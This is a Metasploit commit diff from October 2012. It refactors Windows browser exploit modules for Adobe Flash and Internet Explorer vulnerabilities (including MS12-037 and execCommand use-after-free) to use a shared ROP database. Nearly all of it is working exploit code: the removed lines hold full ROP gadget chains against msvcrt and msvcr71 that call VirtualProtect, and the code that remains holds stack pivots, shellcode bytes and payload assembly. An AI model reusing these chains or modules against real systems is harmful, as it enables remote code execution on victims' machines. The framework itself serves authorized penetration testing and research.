rapid7 · wchen-r7 · Oct 5, 2012 · Oct 5, 2012 · Oct 5, 2012 · Oct 5, 2012
diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
-
+	include Msf::Exploit::RopDb
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:os_name    => OperatingSystems::WINDOWS,
@@ -127,10 +127,6 @@ def junk(n=4)
 		return rand_text_alpha(n).unpack("V").first
 	end
 
-	def nop
-		return make_nops(4).unpack("V").first
-	end
-
 	def get_payload(t, cli)
 
 		if t['Rop'].nil?
@@ -144,64 +140,14 @@ def get_payload(t, cli)
 		# No rop. Just return the payload.
 		return code if t['Rop'].nil?
 
-		# Both ROP chains generated by mona.py - See corelan.be
-		case t['Rop']
-		when :msvcrt
-			print_status("Using msvcrt ROP")
-			exec_size = code.length
-			rop =
-			[
-				0x77c4e392,  # POP EAX # RETN
-				0x77c11120,  # <- *&VirtualProtect()
-				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-				junk,
-				0x77c2dd6c,
-				0x77c4ec00,  # POP EBP # RETN
-				0x77c35459,  # ptr to 'push esp #  ret'
-				0x77c47705,  # POP EBX # RETN
-				exec_size,   # EBX
-				0x77c3ea01,  # POP ECX # RETN
-				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
-				0x77c46100,  # POP EDI # RETN
-				0x77c46101,  # ROP NOP (-> edi)
-				0x77c4d680,  # POP EDX # RETN
-				0x00000040,  # newProtect (0x40) (-> edx)
-				0x77c4e392,  # POP EAX # RETN
-				nop,         # NOPS (-> eax)
-				0x77c12df9,  # PUSHAD # RETN
-			].pack("V*")
-
-		when :jre
-			print_status("Using JRE ROP")
-			exec_size = 0xffffffff - code.length + 1
-			rop =
-			[
-				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				exec_size,   # Value to NEG
-				0x7c347f98,  # RETN (ROP NOP)
-				0x7c3415a2,  # JMP [EAX]
-				0xffffffff,
-				0x7c376402,  # skip 4 bytes
-				0x7c351e05,  # NEG EAX # RETN
-				0x7c345255,  # INC EBX # FPATAN # RETN
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
-				0x7c344f87,  # POP EDX # RETN
-				0xffffffc0,  # Value to negate, will become 0x00000040
-				0x7c351eb1,  # NEG EDX # RETN
-				0x7c34d201,  # POP ECX # RETN
-				0x7c38b001,  # &Writable location
-				0x7c347f97,  # POP EAX # RETN
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
-				0x7c345c30,  # ptr to 'push esp #  ret '
-			].pack("V*")
-		end
+		rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'
+		rop_target = (rop_name == 'msvcrt') ? 'xp' : ''
 
 		pivot  = [t['ppr']].pack('V*')  #POP/POP/RET
 		pivot << [junk].pack('V*')
 		pivot << [t.ret].pack('V*')
 
-		code = pivot + rop + code
+		code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
 		return code
 	end
 

diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 	include Msf::Exploit::Remote::BrowserAutopwn
 
 	autopwn_info({
@@ -122,53 +123,18 @@ def get_target(agent)
 		end
 	end
 
-	def junk(n=4)
-		return rand_text_alpha(n).unpack("V").first
-	end
-
-	def nop
-		return make_nops(4).unpack("V").first
-	end
-
 	def ret(t)
 		return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
 	end
 
-	def popret(t)
-		return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
-	end
-
 	def get_rop_chain(t)
-
-		# ROP chains generated by mona.py - See corelan.be
 		print_status("Using msvcrt ROP")
-		rop =
-			[
-				0x77c4e392,  # POP EAX # RETN
-				0x77c11120,  # <- *&VirtualProtect()
-				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-				junk,
-				0x77c2dd6c,
-				0x77c4ec00,  # POP EBP # RETN
-				0x77c35459,  # ptr to 'push esp #  ret'
-				0x77c47705,  # POP EBX # RETN
-				0x00001000,  # EBX
-				0x77c3ea01,  # POP ECX # RETN
-				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
-				0x77c46100,  # POP EDI # RETN
-				0x77c46101,  # ROP NOP (-> edi)
-				0x77c4d680,  # POP EDX # RETN
-				0x00000040,  # newProtect (0x40) (-> edx)
-				0x77c4e392,  # POP EAX # RETN
-				nop,         # NOPS (-> eax)
-				0x77c12df9,  # PUSHAD # RETN
-			].pack("V*")
+		p = "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
+		p << payload.encoded
 
 		code = ret(t)
 		code << rand_text(119)
-		code << rop
-		code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
-		code << payload.encoded
+		code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
 		offset = 2616 - code.length
 		code << rand_text(offset)
 		code << [ t['StackPivot'] ].pack("V")

diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 
 	def initialize(info={})
 		super(update_info(info,
@@ -182,52 +183,28 @@ def on_request_uri(cli, request)
 		end
 
 		#Targets that don't need ROP
-		rop    = ''
 		pivot  = "\xb8\x0c\x0c\x0c\x0c"  #MOV EAX,0x0c0c0c0c
 		pivot << "\xff\xe0"              #JMP EAX
 		pivot << "\x41"                  #Pad
 
 		#Targets that need ROP
 		if my_target['Rop']
-			#Target Addr=0x0c0c0c0c
-			rop =
-			[
-				0x7c376402,  # POP EBP # RETN [msvcr71.dll]
-				0x7c376402,  # skip 4 bytes [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
-				0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
-				0x7c354901,  # POP EBX # RETN [msvcr71.dll]
-				0xffffffff,
-				0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-				0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
-				0xffffffc0,  # Value to negate, will become 0x00000040
-				0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
-				0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
-				0x7c38b001,  # &Writable location [msvcr71.dll]
-				0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
-				0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
-				0x7c364802,  # POP ESI # RETN [msvcr71.dll]
-				0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-				0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
-			].pack("V*")
-
 			#Target Addr=0x11111110
 			pivot =
 			[
 				0x0c0c0c0c,          # Padding. Value for ESP after the XCHG pivot
 				my_target['Pivot'],  # ROP Pivot
 				0x7c346b52,          # EAX (POP ESP; RETN)
 			].pack('V*')
+
+			#Target Addr=0x0c0c0c0c
+			p = generate_rop_payload('java', payload.encoded)
+		else
+			p = rop + payload.encoded
 		end
 
 		arch = Rex::Arch.endian(my_target.arch)
 
-		p = rop + payload.encoded
 		shellcode = Rex::Text.to_unescape(p, arch)
 		pivot = Rex::Text.to_unescape(pivot, arch)
 

diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
@@ -138,31 +139,9 @@ def get_payload(t, cli)
 				0x77c4e392, # POP EAX # RETN
 				0x77c15ed5, # XCHG EAX, ESP # RETN
 			].pack("V*")
-			rop =
-			[
-				0x77C21891,  # POP ESI # RETN
-				0x0c0c0c04,  # ESI
-				0x77c4e392,  # POP EAX # RETN
-				0x77c11120,  # <- *&VirtualProtect()
-				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-				junk,
-				0x77c2dd6c,  # XCHG EAX,ESI # ADD [EAX], AL # RETN
-				0x77c4ec00,  # POP EBP # RETN
-				0x77c35459,  # ptr to 'push esp #  ret'
-				0x77c47705,  # POP EBX # RETN
-				exec_size,   # EBX
-				0x77c3ea01,  # POP ECX # RETN
-				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
-				0x77c46100,  # POP EDI # RETN
-				0x77c46101,  # ROP NOP (-> edi)
-				0x77c4d680,  # POP EDX # RETN
-				0x00000040,  # newProtect (0x40) (-> edx)
-				0x77c4e392,  # POP EAX # RETN
-				nop,         # NOPS (-> eax)
-				0x77c12df9,  # PUSHAD # RETN
-			].pack("V*")
+			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
 
-		when :jre
+		else
 			print_status("Using JRE ROP")
 			exec_size = 0xffffffff - code.length + 1
 			if t['Random']
@@ -179,31 +158,10 @@ def get_payload(t, cli)
 					0x7c348b05  # XCHG EAX, ESP # RET
 				].pack("V*")
 			end
-			rop =
-			[
-				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				exec_size,   # Value to negate, will become 0x00000201 (dwSize)
-				0x7c347f98,  # RETN (ROP NOP)
-				0x7c3415a2,  # JMP [EAX]
-				0xffffffff,
-				0x7c376402,  # skip 4 bytes
-				0x7c351e05,  # NEG EAX # RETN
-				0x7c345255,  # INC EBX # FPATAN # RETN
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
-				0x7c344f87,  # POP EDX # RETN
-				0xffffffc0,  # Value to negate, will become 0x00000040
-				0x7c351eb1,  # NEG EDX # RETN
-				0x7c34d201,  # POP ECX # RETN
-				0x7c38b001,  # &Writable location
-				0x7c347f97,  # POP EAX # RETN
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
-				0x7c345c30,  # ptr to 'push esp #  ret '
-			].pack("V*")
+			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
 		end
 
-		code = stack_pivot + rop + code
-		return code
+		return rop_payload
 	end
 
 	# Spray published by corelanc0d3r
@@ -313,7 +271,7 @@ def load_html1(cli, my_target)
 				<iframe src="#{this_resource}/#{@html2_name}"></iframe>
 				<script>
 					#{js}
-		        </script>
+				</script>
 			</body>
 		</html>
 		|

diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 
 	def initialize(info={})
 		super(update_info(info,
@@ -105,14 +106,6 @@ def get_target(agent)
 		end
 	end
 
-	def junk(n=4)
-		return rand_text_alpha(n).unpack("V").first
-	end
-
-	def nop
-		return make_nops(4).unpack("V").first
-	end
-
 	def ret(t)
 		case t['Rop']
 		when :msvcrt
@@ -132,63 +125,21 @@ def popret(t)
 	end
 
 	def get_rop_chain(t)
+		pivot = ret(t) * 27
+		pivot << popret(t)
+		pivot << [t.ret].pack("V") # stackpivot
 
-		adjust = ret(t) * 27
-		adjust << popret(t)
-		adjust << [t.ret].pack("V") # stackpivot
-
-		# Both ROP chains generated by mona.py - See corelan.be
 		case t['Rop']
 		when :msvcrt
 			print_status("Using msvcrt ROP")
-			rop =
-			[
-				0x77c4e392,  # POP EAX # RETN
-				0x77c11120,  # <- *&VirtualProtect()
-				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-				junk,
-				0x77c2dd6c,
-				0x77c4ec00,  # POP EBP # RETN
-				0x77c35459,  # ptr to 'push esp #  ret'
-				0x77c47705,  # POP EBX # RETN
-				0x00001000,  # EBX
-				0x77c3ea01,  # POP ECX # RETN
-				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
-				0x77c46100,  # POP EDI # RETN
-				0x77c46101,  # ROP NOP (-> edi)
-				0x77c4d680,  # POP EDX # RETN
-				0x00000040,  # newProtect (0x40) (-> edx)
-				0x77c4e392,  # POP EAX # RETN
-				nop,         # NOPS (-> eax)
-				0x77c12df9,  # PUSHAD # RETN
-			].pack("V*")
+			rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
 
-		when :jre
+		else
 			print_status("Using JRE ROP")
-			rop =
-			[
-				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				0x00001000,  # (dwSize)
-				0x7c347f98,  # RETN (ROP NOP)
-				0x7c3415a2,  # JMP [EAX]
-				0xffffffff,
-				0x7c376402,  # skip 4 bytes
-				0x7c345255,  # INC EBX # FPATAN # RETN
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
-				0x7c344f87,  # POP EDX # RETN
-				0x00000040,  # flNewProtect
-				0x7c34d201,  # POP ECX # RETN
-				0x7c38b001,  # &Writable location
-				0x7c347f97,  # POP EAX # RETN
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
-				0x7c345c30,  # ptr to 'push esp #  ret '
-			].pack("V*")
+			rop = generate_rop_payload('java', '', {'pivot'=>pivot})
 		end
 
-		code = adjust
-		code << rop
-		return code
+		return rop
 
 	end